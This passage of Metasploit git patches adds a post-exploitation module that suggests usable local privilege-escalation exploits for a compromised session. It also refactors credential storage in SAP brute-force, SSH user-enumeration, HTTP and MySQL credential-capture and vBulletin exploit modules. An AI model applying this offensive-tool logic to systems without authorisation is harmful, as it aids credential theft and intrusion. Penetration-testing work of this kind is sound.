diff --git a/modules/post/multi/recon/local_exploit_suggestor.rb b/modules/post/multi/recon/local_exploit_suggestor.rb
new file mode 100644
index 0000000000..ce831617a2
--- /dev/null
+++ b/modules/post/multi/recon/local_exploit_suggestor.rb
@@ -0,0 +1,127 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+
+  def initialize(info={})
+    super(update_info(info,
+        'Name'          => 'Multi Recon Local Exploit Suggestor',
+        'Description'   => %q{
+          Save this for later!!!!
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ '_sinn3r, ' ],
+        'Platform'      => all_platforms,
+        'SessionTypes'  => [ 'meterpreter', 'shell' ]
+    ))
+      register_options( [
+          Msf::OptInt.new('SESSION', [ true, "The session to run this module on." ]),
+          Msf::OptBool.new('SHOW_DESCRIPTION', [true, "Displays a detailed description for the available exploits", false])
+      ],Msf::Post)
+  end
+#
+  def all_platforms
+    Msf::Module::Platform.subclasses.collect {|c| c.realname.downcase }
+  end
+
+  def get_target_arch
+    @target_arch ||= lambda {
+      return nil unless session
+      session.platform.split('/').first
+    }.call
+  end
+
+  def get_target_platform
+    @target_platform ||= lambda {
+      return nil unless session
+      platform = session.platform.split('/').second
+
+      if platform =~ /^win/
+        platform = 'win'
+      end
+
+      return platform
+    }.call
+  end
+
+  def is_module_arch?(mod)
+    mod_arch = mod.target.arch || mod.arch
+    mod_arch.include?(get_target_arch)
+  end
+
+  def is_module_options_ready?(mod)
+    mod.options.each_pair do |option_name, option|
+      if option.required && option.default.nil?
+        return false
+      end
+    end
+
+    true
+  end
+
+  def is_module_platform?(mod)
+    platform_obj = nil
+    begin
+      platform_obj = Msf::Module::Platform.find_platform(get_target_platform)
+    rescue ArgumentError
+      # When not found, find_platform raises an ArgumentError
+      return false
+    end
+
+    module_platforms = mod.target.platform ? mod.target.platform.platforms : mod.platform.platforms
+    module_platforms.include?(platform_obj)
+  end
+
+  def setup
+    print_status "Collecting local exploits . . ."
+    #Initializes an array
+    @local_exploits = []
+    # Collects exploits into an array
+    framework.exploits.each do |name, obj|
+      mod = framework.exploits.create(name)
+      mod.datastore.merge!(self.datastore)
+      # If the module matches the platform and architecture conditions, then add to @local_exploits
+       if mod.kind_of?(Msf::Exploit::Local) && mod.respond_to?(:check) && is_module_platform?(mod) && is_module_arch?(mod) && is_module_options_ready?(mod)
+         @local_exploits << mod
+       end
+     end
+  end
+
+  def run
+    @local_exploits.each do |m|
+    begin
+      checkcode = m.check
+        # See def is_check_interesting?
+        if is_check_interesting?(checkcode)
+          # Prints the full name and the checkcode message for the exploit
+          print_good("#{m.fullname}: #{checkcode.second}")
+          #If the datastore option is true, a detailed description will show
+          if datastore['SHOW_DESCRIPTION']
+            # Formatting for the description text
+            print_line Rex::Text.wordwrap(Rex::Text.compress(mod.description), 2, 70)
+            end
+          else
+            # Prints the full name and the checkcode message for the exploit
+            vprint_status("#{m.fullname}: #{checkcode.second}")
+          end
+     # Creates a log record in framework.log
+     rescue ::Exception => e
+       elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+       vprint_error("#{m.shortname} failled to run: #{e.message}")
+     end
+  end
+  end
+
+  def is_check_interesting?(checkcode)
+    [
+      Msf::Exploit::CheckCode::Vulnerable,
+      Msf::Exploit::CheckCode::Appears,
+      Msf::Exploit::CheckCode::Detected
+    ].include?(checkcode)
+  end
+
+end

From 54c5c6ea38199b09cfd358bb0aa6f9edcd3445bc Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 29 Jul 2015 14:31:35 -0500
Subject: [PATCH 0897/1013] Another update

---
 .../scanner/sap/sap_soap_bapi_user_create1.rb | 38 ++++++++++--
 .../scanner/sap/sap_soap_rfc_brute_login.rb   | 43 +++++++++++---
 .../scanner/sap/sap_web_gui_brute_login.rb    | 59 +++++++++++++------
 .../scanner/ssh/cerberus_sftp_enumusers.rb    | 27 ++++++---
 .../auxiliary/scanner/ssh/ssh_enumusers.rb    | 27 ++++++---
 modules/auxiliary/server/capture/http.rb      | 42 ++++++++++---
 modules/auxiliary/server/capture/mysql.rb     | 44 ++++++++++----
 .../unix/webapp/vbulletin_vote_sqli_exec.rb   | 26 ++++++++
 .../auxiliary/test/report_auth_info.rb        | 49 +++++++++++++++
 9 files changed, 290 insertions(+), 65 deletions(-)

diff --git a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
index e3398ad301..fe6c3acb6d 100644
--- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
@@ -52,6 +52,32 @@ class Metasploit4 < Msf::Auxiliary
       ], self.class)
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def run_host(ip)
     data = '<?xml version="1.0" encoding="utf-8" ?>'
     data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
@@ -99,12 +125,12 @@ class Metasploit4 < Msf::Auxiliary
         else
           print_good("[SAP] #{ip}:#{rport} - User '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}' created")
           report_auth_info(
-            :host => ip,
-            :port => rport,
-            :sname => "sap",
-            :user => "#{datastore['BAPI_USER']}",
-            :pass => "#{datastore['BAPI_PASSWORD']}",
-            :active => true
+            ip: ip,
+            port: rport,
+            service_name: 'sap',
+            user: datastore['BAPI_USER'],
+            password: datastore['BAPI_PASSWORD'],
+            proof: res.body
           )
           return
         end
diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb
index 0e42d39ce5..1febb6b023 100644
--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb
@@ -101,6 +101,33 @@ class Metasploit4 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def bruteforce(username,password,client)
     uri = normalize_uri(target_uri.path)
 
@@ -132,15 +159,13 @@ class Metasploit4 < Msf::Auxiliary
 
     if res && res.code == 200 && res.body.include?('RFC_PING')
       print_good("#{peer} [SAP] Client #{client}, valid credentials #{username}:#{password}")
-      report_auth_info(
-        :host => rhost,
-        :port => rport,
-        :sname => "sap",
-        :proto => "tcp",
-        :user => username,
-        :pass => password,
-        :proof => "SAP Client: #{client}",
-        :active => true
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: 'sap',
+        user: username,
+        password: password,
+        proof: "SAP Client: #{client}"
       )
       return true
     end
diff --git a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb
index b54eb2d44e..ebac99fd8b 100644
--- a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb
+++ b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb
@@ -107,6 +107,33 @@ class Metasploit4 < Msf::Auxiliary
 
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def bruteforce(uri,user,pass,cli)
     begin
       path = "sap/bc/gui/sap/its/webgui/"
@@ -134,30 +161,26 @@ class Metasploit4 < Msf::Auxiliary
     end
 
     if res and res.code == 302
-      report_auth_info(
-        :host => rhost,
-        :port => rport,
-        :sname => "sap_webgui",
-        :proto => "tcp",
-        :user => "#{user}",
-        :pass => "#{pass}",
-        :proof => "SAP Client: #{cli}",
-        :active => true
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: 'sap_webgui',
+        user: user,
+        password: pass,
+        proof: "SAP Client: #{cli}"
       )
       return true
     elsif res and res.code == 200
       if res.body =~ /log on again/
         return false
       elsif res.body =~ /<title>Change Password - SAP Web Application Server<\/title>/
-        report_auth_info(
-          :host => rhost,
-          :port => rport,
-          :sname => "sap_webgui",
-          :proto => "tcp",
-          :user => "#{user}",
-          :pass => "#{pass}",
-          :proof => "SAP Client: #{cli}",
-          :active => true
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: 'sap_webgui',
+          user: user,
+          password: pass,
+          proof: "SAP Client: #{cli}"
         )
         return true
       elsif res.body =~ /Password logon no longer possible - too many failed attempts/
diff --git a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb
index 3b6cf7c2ae..52becd24cc 100644
--- a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb
@@ -140,13 +140,26 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def do_report(ip, user, port)
-    report_auth_info(
-      :host   => ip,
-      :port   => rport,
-      :sname  => 'ssh',
-      :user   => user,
-      :active => true
-    )
+    service_data = {
+      address: ip,
+      port: rport,
+      service_name: 'ssh',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: user,
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 
   def peer(rhost=nil)
diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
index bb7dc4ce44..3379adad44 100644
--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -118,13 +118,26 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def do_report(ip, user, port)
-    report_auth_info(
-      :host   => ip,
-      :port   => rport,
-      :sname  => 'ssh',
-      :user   => user,
-      :active => true
-    )
+    service_data = {
+      address: ip,
+      port: rport,
+      service_name: 'ssh',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: user,
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 
   # Because this isn't using the AuthBrute mixin, we don't have the
diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb
index 784ce1814d..721835e278 100644
--- a/modules/auxiliary/server/capture/http.rb
+++ b/modules/auxiliary/server/capture/http.rb
@@ -110,6 +110,32 @@ class Metasploit3 < Msf::Auxiliary
     raise ::EOFError
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def dispatch_request(cli, req)
 
     phost = cli.peerhost
@@ -187,14 +213,14 @@ class Metasploit3 < Msf::Auxiliary
     if(req['Authorization'] and req['Authorization'] =~ /basic/i)
       basic,auth = req['Authorization'].split(/\s+/)
       user,pass  = Rex::Text.decode_base64(auth).split(':', 2)
-      report_auth_info(
-        :host      => cli.peerhost,
-        :port      => @myport,
-        :sname     => (ssl ? "https" : "http"),
-        :user      => user,
-        :pass      => pass,
-        :source_type => "captured",
-        :active    => true
+
+      report_cred(
+        ip: cli.peerhost,
+        port: @myport,
+        service_name: (ssl ? "https" : "http"),
+        user: user,
+        pass: pass,
+        proof: req.resource.to_s
       )
 
       report_note(
diff --git a/modules/auxiliary/server/capture/mysql.rb b/modules/auxiliary/server/capture/mysql.rb
index 82d13dc22a..a11ff87366 100644
--- a/modules/auxiliary/server/capture/mysql.rb
+++ b/modules/auxiliary/server/capture/mysql.rb
@@ -128,6 +128,32 @@ class Metasploit3 < Msf::Auxiliary
     c.put data
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def on_client_data(c)
     info = { :errors => [] }
     data = c.get_once
@@ -144,16 +170,14 @@ class Metasploit3 < Msf::Auxiliary
         print_status("#{@state[c][:name]} - User: #{info[:username]}; Challenge: #{@challenge.unpack('H*')[0]}; Response: #{info[:response].unpack('H*')[0]}")
       end
       hash_line = "#{info[:username]}:$mysql$#{@challenge.unpack("H*")[0]}$#{info[:response].unpack('H*')[0]}"
-      report_auth_info(
-        :host  => c.peerhost,
-        :port => datastore['SRVPORT'],
-        :sname => 'mysql_client',
-        :user => info[:username],
-        :pass => hash_line,
-        :type => "mysql_hash",
-        :proof => info[:database] ? info[:database] : hash_line,
-        :source_type => "captured",
-        :active => true
+
+      report_cred(
+        ip: c.peerhost,
+        port: datastore['SRVPORT'],
+        service_name: 'mysql_client',
+        user: info[:username],
+        pass: hash_line,
+        proof: info[:database] ? info[:database] : hash_line
       )
 
       if (datastore['CAINPWFILE'])
diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb
index 182688550f..b3943cb4fb 100644
--- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb
+++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb
@@ -371,6 +371,32 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def exploit
     print_status("#{peer} - Checking for a valid node id...")
     node_id = get_node
diff --git a/test/modules/auxiliary/test/report_auth_info.rb b/test/modules/auxiliary/test/report_auth_info.rb
index af7ffcc6b6..ef63d59539 100644
--- a/test/modules/auxiliary/test/report_auth_info.rb
+++ b/test/modules/auxiliary/test/report_auth_info.rb
@@ -324,20 +324,69 @@ class Metasploit3 < Msf::Auxiliary
     mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'Oracle Integrated Lights Out Manager Portal', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
   end
 
+  def test_mysql
+    mod = framework.auxiliary.create('server/capture/mysql')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'mysql_client', user: FAKE_USER, pass: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_http
+    mod = framework.auxiliary.create('server/capture/http')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, pass: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_ssh_enumusers
+    mod = framework.auxiliary.create('scanner/ssh/ssh_enumusers')
+    mod.do_report(FAKE_IP, FAKE_USER, FAKE_PORT)
+  end
+
+  def test_cerberus_sftp_enumusers
+    mod = framework.auxiliary.create('scanner/ssh/cerberus_sftp_enumusers')
+    mod.do_report(FAKE_IP, FAKE_USER, FAKE_PORT)
+  end
+
+  def test_sap_web_gui_brute_login
+    mod = framework.auxiliary.create('scanner/sap/sap_web_gui_brute_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sap_webgui', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_sap_soap_rfc_brute_login
+    mod = framework.auxiliary.create('scanner/sap/sap_soap_rfc_brute_login')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sap', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  def test_sap_soap_bapi_user_create1
+    mod = framework.auxiliary.create('scanner/sap/sap_soap_bapi_user_create1')
+    mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sap', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
+  end
+
+  
+
   def run
+    counter_all  = 0
+    counter_good = 0
+    counter_bad = 0
     self.methods.each do |m|
       next if m.to_s !~ /^test_.+/
       print_status("Trying: ##{m.to_s}")
       begin
         self.send(m)
         print_good("That didn't blow up. Good!")
+        counter_good += 1
       rescue ::Exception => e
         print_error("That blew up :-(")
         print_line("#{e.class} #{e.message}\n#{e.backtrace*"\n"}")
+        counter_bad += 1
       ensure
         print_line
       end
+
+      counter_all += 1
     end
+
+    print_good("Number of test cases that passed: #{counter_good}")
+    print_error("Number of test cases that failed: #{counter_bad}")
+    print_status("Number of test cases overall: #{counter_all}")
+    print_line
   end
 
 end

From 2cddfda0a0e92237c3e7d00f4ccf9ff28287b697 Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Wed, 29 Jul 2015 16:13:50 -0500
Subject: [PATCH 0898/1013] wchen-r7's fixes, fixed indentation, removed
 newlines, added desc.

---
 .../multi/recon/local_exploit_suggestor.rb    | 78 +++++++++++++------
 1 file changed, 56 insertions(+), 22 deletions(-)

diff --git a/modules/post/multi/recon/local_exploit_suggestor.rb b/modules/post/multi/recon/local_exploit_suggestor.rb
index ce831617a2..9efbac9759 100644
--- a/modules/post/multi/recon/local_exploit_suggestor.rb
+++ b/modules/post/multi/recon/local_exploit_suggestor.rb
@@ -11,23 +11,37 @@ class Metasploit3 < Msf::Post
     super(update_info(info,
         'Name'          => 'Multi Recon Local Exploit Suggestor',
         'Description'   => %q{
-          Save this for later!!!!
+          This module suggests local meterpreter exploits that can be used. The
+          exploits are suggested based on the architecture and platform that
+          the user has a shell opened as well as the available exploits in
+          meterpreter. Additionally, the SHOW_DESCRIPTION option can be set
+          to 'true' to a detailed description on the suggested exploits.
+
+          It's important to note that not all local exploits will be fired. For
+          example, if a module doesn't have a default datastore option that is
+          required for it to run, then it will not come up in the suggestor's
+          results.
         },
         'License'       => MSF_LICENSE,
-        'Author'        => [ '_sinn3r, ' ],
+        'Author'        => [ 'sinn3r',
+                             'Mo'
+                           ],
         'Platform'      => all_platforms,
         'SessionTypes'  => [ 'meterpreter', 'shell' ]
     ))
-      register_options( [
-          Msf::OptInt.new('SESSION', [ true, "The session to run this module on." ]),
-          Msf::OptBool.new('SHOW_DESCRIPTION', [true, "Displays a detailed description for the available exploits", false])
-      ],Msf::Post)
+
+    register_options([
+      Msf::OptInt.new('SESSION', [ true, "The session to run this module on." ]),
+      Msf::OptBool.new('SHOW_DESCRIPTION', [true, "Displays a detailed description for the available exploits", false])
+    ],Msf::Post)
   end
-#
+
+
   def all_platforms
     Msf::Module::Platform.subclasses.collect {|c| c.realname.downcase }
   end
 
+
   def get_target_arch
     @target_arch ||= lambda {
       return nil unless session
@@ -35,6 +49,7 @@ class Metasploit3 < Msf::Post
     }.call
   end
 
+
   def get_target_platform
     @target_platform ||= lambda {
       return nil unless session
@@ -48,6 +63,7 @@ class Metasploit3 < Msf::Post
     }.call
   end
 
+
   def is_module_arch?(mod)
     mod_arch = mod.target.arch || mod.arch
     mod_arch.include?(get_target_arch)
@@ -55,11 +71,10 @@ class Metasploit3 < Msf::Post
 
   def is_module_options_ready?(mod)
     mod.options.each_pair do |option_name, option|
-      if option.required && option.default.nil?
+      if option.required && option.default.nil? && mod.datastore[option_name].blank?
         return false
       end
     end
-
     true
   end
 
@@ -71,24 +86,32 @@ class Metasploit3 < Msf::Post
       # When not found, find_platform raises an ArgumentError
       return false
     end
-
     module_platforms = mod.target.platform ? mod.target.platform.platforms : mod.platform.platforms
     module_platforms.include?(platform_obj)
   end
 
+  def set_module_options(mod)
+    mod.datastore.merge!(self.datastore)
+    mod.datastore['SESSION'] = session.sid if !mod.datastore['SESSION'] && session
+  end
+
   def setup
-    print_status "Collecting local exploits . . ."
+    print_status "Collecting local exploits..."
     #Initializes an array
     @local_exploits = []
     # Collects exploits into an array
     framework.exploits.each do |name, obj|
       mod = framework.exploits.create(name)
-      mod.datastore.merge!(self.datastore)
-      # If the module matches the platform and architecture conditions, then add to @local_exploits
-       if mod.kind_of?(Msf::Exploit::Local) && mod.respond_to?(:check) && is_module_platform?(mod) && is_module_arch?(mod) && is_module_options_ready?(mod)
+      next unless mod
+      set_module_options(mod)
+        if mod.kind_of?(Msf::Exploit::Local) &&
+          mod.respond_to?(:check)  &&
+          is_module_platform?(mod) &&
+          is_module_arch?(mod) &&
+          is_module_options_ready?(mod)
          @local_exploits << mod
-       end
-     end
+        end
+      end
   end
 
   def run
@@ -103,17 +126,17 @@ class Metasploit3 < Msf::Post
           if datastore['SHOW_DESCRIPTION']
             # Formatting for the description text
             print_line Rex::Text.wordwrap(Rex::Text.compress(mod.description), 2, 70)
-            end
+          end
           else
             # Prints the full name and the checkcode message for the exploit
             vprint_status("#{m.fullname}: #{checkcode.second}")
           end
      # Creates a log record in framework.log
-     rescue ::Exception => e
-       elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
-       vprint_error("#{m.shortname} failled to run: #{e.message}")
-     end
-  end
+        rescue ::Exception => e
+          elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+          vprint_error("#{m.shortname} failled to run: #{e.message}")
+        end
+      end
   end
 
   def is_check_interesting?(checkcode)
@@ -124,4 +147,15 @@ class Metasploit3 < Msf::Post
     ].include?(checkcode)
   end
 
+  def print_status(msg='')
+    super("#{session.sock.peerhost} - #{msg}")
+  end
+
+  def print_good(msg='')
+    super("#{session.sock.peerhost} - #{msg}")
+  end
+
+  def print_error(msg='')
+    super("#{session.sock.peerhost} - #{msg}")
+  end
 end

From b58c6248fefddcc80aca786e88fa9212d03777f8 Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Wed, 29 Jul 2015 16:52:06 -0500
Subject: [PATCH 0899/1013] Fixed ShowDescription bug

---
 modules/post/multi/recon/local_exploit_suggestor.rb | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/modules/post/multi/recon/local_exploit_suggestor.rb b/modules/post/multi/recon/local_exploit_suggestor.rb
index 9efbac9759..97c06964b7 100644
--- a/modules/post/multi/recon/local_exploit_suggestor.rb
+++ b/modules/post/multi/recon/local_exploit_suggestor.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Post
           This module suggests local meterpreter exploits that can be used. The
           exploits are suggested based on the architecture and platform that
           the user has a shell opened as well as the available exploits in
-          meterpreter. Additionally, the SHOW_DESCRIPTION option can be set
+          meterpreter. Additionally, the ShowDescription option can be set
           to 'true' to a detailed description on the suggested exploits.
 
           It's important to note that not all local exploits will be fired. For
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Post
 
     register_options([
       Msf::OptInt.new('SESSION', [ true, "The session to run this module on." ]),
-      Msf::OptBool.new('SHOW_DESCRIPTION', [true, "Displays a detailed description for the available exploits", false])
+      Msf::OptBool.new('ShowDescription', [true, "Displays a detailed description for the available exploits", false])
     ],Msf::Post)
   end
 
@@ -123,9 +123,10 @@ class Metasploit3 < Msf::Post
           # Prints the full name and the checkcode message for the exploit
           print_good("#{m.fullname}: #{checkcode.second}")
           #If the datastore option is true, a detailed description will show
-          if datastore['SHOW_DESCRIPTION']
+          if datastore['ShowDescription']
             # Formatting for the description text
-            print_line Rex::Text.wordwrap(Rex::Text.compress(mod.description), 2, 70)
+            print_line("\n")
+            print_line Rex::Text.wordwrap(Rex::Text.compress(m.description), 2, 70)
           end
           else
             # Prints the full name and the checkcode message for the exploit

From 66489202fcfe7669f9c524b55d66ed2ed7c838e1 Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Wed, 29 Jul 2015 17:31:23 -0500
Subject: [PATCH 0900/1013] Added error message if no exploits are found

---
 modules/post/multi/recon/local_exploit_suggestor.rb | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/modules/post/multi/recon/local_exploit_suggestor.rb b/modules/post/multi/recon/local_exploit_suggestor.rb
index 97c06964b7..3f2db4f79c 100644
--- a/modules/post/multi/recon/local_exploit_suggestor.rb
+++ b/modules/post/multi/recon/local_exploit_suggestor.rb
@@ -138,6 +138,9 @@ class Metasploit3 < Msf::Post
           vprint_error("#{m.shortname} failled to run: #{e.message}")
         end
       end
+        if @local_exploits.length < 1
+          print_error "No exploits were found. "
+        end
   end
 
   def is_check_interesting?(checkcode)

From 1521c8f87e81ca01f9788f4374a93ee73617137c Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Wed, 29 Jul 2015 17:40:27 -0500
Subject: [PATCH 0901/1013] Reworded to no suggestions available

---
 modules/post/multi/recon/local_exploit_suggestor.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/multi/recon/local_exploit_suggestor.rb b/modules/post/multi/recon/local_exploit_suggestor.rb
index 3f2db4f79c..c61f336c86 100644
--- a/modules/post/multi/recon/local_exploit_suggestor.rb
+++ b/modules/post/multi/recon/local_exploit_suggestor.rb
@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Post
         end
       end
         if @local_exploits.length < 1
-          print_error "No exploits were found. "
+          print_error "No suggestions available. "
         end
   end
 

From a687e718329da34ba1d48877618aacff0b92776b Mon Sep 17 00:00:00 2001
From: Roberto Soares <robertoespreto@gmail.com>
Date: Thu, 30 Jul 2015 01:22:48 -0300
Subject: [PATCH 0902/1013] Added check for the WPVDB in msftidy.

---
 tools/msftidy.rb | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/tools/msftidy.rb b/tools/msftidy.rb
index 3857c311c2..f78b4e9c64 100755
--- a/tools/msftidy.rb
+++ b/tools/msftidy.rb
@@ -191,6 +191,8 @@ class Msftidy
           warn("Invalid US-CERT-VU reference") if value !~ /^\d+$/
         when 'ZDI'
           warn("Invalid ZDI reference") if value !~ /^\d{2}-\d{3}$/
+        when 'WPVDB'
+          warn("Invalid WPVDB reference") if value !~ /^\d+$/
         when 'URL'
           if value =~ /^http:\/\/www\.osvdb\.org/
             warn("Please use 'OSVDB' for '#{value}'")
@@ -204,6 +206,8 @@ class Msftidy
             warn("Please use 'EDB' for '#{value}'")
           elsif value =~ /^http:\/\/www\.kb\.cert\.org\/vuls\/id\//
             warn("Please use 'US-CERT-VU' for '#{value}'")
+          elsif value =~ /^http:\/\/wpvulndb\.com\/vulnerabilities\//
+            warn("Please use 'WPVDB' for '#{value}'")
           end
         end
       end

From 77f96769da01cdccf148b7fda7a56f34640f155d Mon Sep 17 00:00:00 2001
From: Roberto Soares <robertoespreto@gmail.com>
Date: Thu, 30 Jul 2015 01:33:48 -0300
Subject: [PATCH 0903/1013] Update msftidy.

---
 tools/msftidy.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/tools/msftidy.rb b/tools/msftidy.rb
index f78b4e9c64..34ec47a17b 100755
--- a/tools/msftidy.rb
+++ b/tools/msftidy.rb
@@ -206,7 +206,7 @@ class Msftidy
             warn("Please use 'EDB' for '#{value}'")
           elsif value =~ /^http:\/\/www\.kb\.cert\.org\/vuls\/id\//
             warn("Please use 'US-CERT-VU' for '#{value}'")
